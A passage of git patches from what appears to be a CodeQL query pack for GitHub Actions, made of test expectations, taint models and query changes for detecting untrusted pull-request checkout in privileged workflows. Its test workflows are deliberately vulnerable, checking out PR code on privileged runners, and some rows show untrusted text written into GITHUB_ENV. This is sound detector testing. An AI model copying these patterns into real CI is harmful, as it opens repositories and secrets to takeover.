.github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | -| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | -| Rishabh510/Path-lister-action | * | output.paths | filename | manual | -| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | -| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | -| ab185508/file-type-finder | * | output.names | filename | manual | -| ab185508/file-type-finder | * | output.paths | filename | manual | -| ahmadnassri/action-changed-files | * | output.files | filename | manual | -| ahmadnassri/action-changed-files | * | output.json | json | manual | -| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | -| amannn/action-semantic-pull-request | * | output.error_message | text | manual | -| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | -| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | -| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | -| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | -| jitterbit/get-changed-files | * | output.added | filename | manual | -| jitterbit/get-changed-files | * | output.added_modified | filename | manual | -| jitterbit/get-changed-files | * | output.all | filename | manual | -| jitterbit/get-changed-files | * | output.deleted | filename | manual | -| jitterbit/get-changed-files | * | output.modified | filename | manual | -| jitterbit/get-changed-files | * | output.removed | filename | manual | -| jitterbit/get-changed-files | * | output.renamed | filename | manual | -| jsmith/changes-since-last-tag | * | output.added | filename | manual | -| jsmith/changes-since-last-tag | * | output.files | filename | manual | -| jsmith/changes-since-last-tag | * | output.modified | filename | manual | -| jsmith/changes-since-last-tag | * | output.removed | filename | manual | -| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | -| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | -| knu/changed-files | * | output.changed_files | filename | manual | -| knu/changed-files | * | output.changed_files_json | filename | manual | -| knu/changed-files | * | output.matched_files | filename | manual | -| knu/changed-files | * | output.matched_files_json | filename | manual | -| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | -| marocchino/on_artifact | * | output.* | artifact | manual | -| martinhaintz/ga-file-list | * | output.file_names | filename | manual | -| martinhaintz/ga-file-list | * | output.files | filename | manual | -| peter-murray/issue-body-parser-action | * | output.* | text | manual | -| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | -| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | -| the-coding-turtle/ga-file-list | * | output.files | filename | manual | -| tj-actions/branch-names | * | output.current_branch | branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | -| trilom/file-changes-action | * | output.files | filename | manual | -| trilom/file-changes-action | * | output.files_added | filename | manual | -| trilom/file-changes-action | * | output.files_modified | filename | manual | -| trilom/file-changes-action | * | output.files_removed | filename | manual | -| tzkhan/pr-update-action | * | output.headMatch | branch | manual | -| w3f/action-find-old-files | * | output.files | filename | manual | -| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | -| yumemi-inc/changed-files | * | output.files | filename | manual | -summaries -| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | -| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | -| Reedyuk/read-properties | * | artifact | output.value | taint | manual | -| SebRollen/toml-action | * | artifact | output.value | taint | manual | -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | -| andstor/file-reader-action | * | artifact | output.contents | taint | manual | -| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | -| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | -| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | -| bfren/read-file | * | artifact | output.contents | taint | manual | -| bobheadxi/deployments | * | input.env | output.env | taint | manual | -| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | -| christian-draeger/read-properties | * | artifact | output.* | taint | manual | -| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | -| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | -| dangdennis/toml-action | * | artifact | output.value | taint | manual | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | -| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | -| drawpile/drawpile | * | input.path | output.path | taint | manual | -| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | -| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | -| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | -| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | -| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | -| gagle/package-version | * | artifact | output.version | taint | manual | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | -| getsentry/action-release | * | input.version | output.version | taint | manual | -| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | -| github/codeql-action | * | input.output | output.sarif-output | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | -| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | -| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | -| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | -| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | -| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | -| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | -| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | -| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | -| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | -| juliangruber/read-file-action | * | artifact | output.content | taint | manual | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | -| komorebitech/read-files-action | * | artifact | output.content | taint | manual | -| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | -| kurt-code/gha-properties | * | artifact | output.* | taint | manual | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | -| linkerd/linkerd2 | * | input.component | output.image | taint | manual | -| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | -| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | -| madhead/read-java-properties | * | artifact | output.* | taint | manual | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | -| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | -| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | -| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | -| novuhq/novu | * | input.docker_name | output.image | taint | manual | -| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | -| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | -| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | -| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | -| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | -| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | -| simonblund/version-reader | * | artifact | output.version | taint | manual | -| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | -| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | -| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | -| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | -calls -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv1 -| JSON_RESPONSE<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}) | PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV})\nEOF | -| VAR0 | $TITLE | VAR0<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | -| VAR6 | ${ISSUE_BODY3} | VAR6=${ISSUE_BODY3} | -| VAR7 | Hello\nWorld | VAR7<> $GITHUB_ENV + + - name: Test formalities + run: | + source .github/workflows/scripts/ci_helpers.sh + + RET=0 + for commit in $(git rev-list HEAD ^origin/$BRANCH); do + info "=== Checking commit '$commit'" + if git show --format='%P' -s $commit | grep -qF ' '; then + err "Pull request should not include merge commits" + RET=1 + fi + + author="$(git show -s --format=%aN $commit)" + if echo $author | grep -q '\S\+\s\+\S\+'; then + success "Author name ($author) seems ok" + else + err "Author name ($author) need to be your real name 'firstname lastname'" + RET=1 + fi + + subject="$(git show -s --format=%s $commit)" + if echo "$subject" | grep -q -e '^[0-9A-Za-z,+/_\.-]\+: ' -e '^Revert '; then + success "Commit subject line seems ok ($subject)" + else + err "Commit subject line MUST start with ': ' ($subject)" + RET=1 + fi + + body="$(git show -s --format=%b $commit)" + sob="$(git show -s --format='Signed-off-by: %aN <%aE>' $commit)" + if echo "$body" | grep -qF "$sob"; then + success "Signed-off-by match author" + else + err "Signed-off-by is missing or doesn't match author (should be '$sob')" + RET=1 + fi + + if echo "$body" | grep -v "Signed-off-by:"; then + success "A commit message exists" + else + err "Missing commit message. Please describe your changes" + RET=1 + fi + done + + exit $RET diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml new file mode 100644 index 00000000000..c91b68f6b87 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml @@ -0,0 +1,12 @@ +name: Test Formalities + +on: + pull_request: + +permissions: + contents: read + +jobs: + build: + name: Test Formalities + uses: TestOrg/TestRepo/.github/workflows/formal.yml@main diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3db6902ad2f..d9cbfe804ae 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,8 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 9f3e500817a..eb9fcc2418a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,3 +1,4 @@ +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 269c1de902b0028873fbb813a90150fc06b9956d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 10:22:18 +0200 Subject: [PATCH 0521/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ec2e82dfe01..b4c388cf615 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.49 +version: 0.1.50 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 70f493e1d64..e5709a52329 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.49 +version: 0.1.50 groups: [actions, queries] suites: codeql-suites extractor: javascript From 53f82d3d6c54a49dbba84e3e47782c6a7a2d54f5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 12:29:35 +0200 Subject: [PATCH 0522/1267] Control Checks in Run/Uses steps also protect Jobs that depend on them --- .../codeql/actions/security/ControlChecks.qll | 14 +- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 30 +- .../CWE-829/.github/workflows/test14.yml | 227 +++++++++++++++ .../CWE-829/.github/workflows/test15.yml | 271 ++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 37 +++ 6 files changed, 571 insertions(+), 16 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 26bee3ca3a6..1a47f4d92d0 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -59,7 +59,15 @@ abstract class ControlCheck extends AstNode { step.getEnclosingJob().getANeededJob().getEnvironment() = this ) or - this.(Step).getAFollowingStep() = step + ( + this instanceof Run or + this instanceof UsesStep + ) and + ( + this.(Step).getAFollowingStep() = step + or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) + ) } abstract predicate protectsCategoryAndEvent(string category, string event); @@ -188,9 +196,7 @@ class AssociationIfCheck extends AssociationCheck instanceof If { ".*\\bgithub\\.event\\.comment\\.author_association\\b.*", ".*\\bgithub\\.event\\.issue\\.author_association\\b.*", ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*", - ]) and - normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bMEMBER\\b.*") and - normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bOWNER\\b.*") + ]) } } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 499abc047b6..9efd9b036cd 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -29,8 +29,14 @@ where ( // issue_comment: check for date comparison checks and actor/access control checks exists(Event event | - event.getName() = "issue_comment" and event = checkout.getEnclosingJob().getATriggerEvent() and + ( + event.getName() = "issue_comment" + or + event.getName() = "workflow_call" and + checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = + "issue_comment" + ) and not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( check instanceof ActorCheck or diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 8577218800e..ce138fb0478 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -26,23 +26,31 @@ where inPrivilegedContext(checkout) and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event e | - e.getName() = "issue_comment" and - checkout.getEnclosingJob().getATriggerEvent() = e and - not exists(ControlCheck write_check, CommentVsHeadDateCheck data_check | - (write_check instanceof ActorCheck or write_check instanceof AssociationCheck) and - write_check.dominates(checkout) and - data_check.dominates(checkout) + exists(Event event | + event = checkout.getEnclosingJob().getATriggerEvent() and + ( + event.getName() = "issue_comment" + or + event.getName() = "workflow_call" and + checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = + "issue_comment" + ) and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | + ( + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck + ) and + check.dominates(checkout) and + date_check.dominates(checkout) ) ) or // not issue_comment triggered workflows exists(Event event | not event.getName() = "issue_comment" and - not exists(ControlCheck check | - check - .protects(checkout, checkout.getEnclosingJob().getATriggerEvent(), "untrusted-checkout") - ) + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) ) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml new file mode 100644 index 00000000000..6f03a0e966a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml @@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 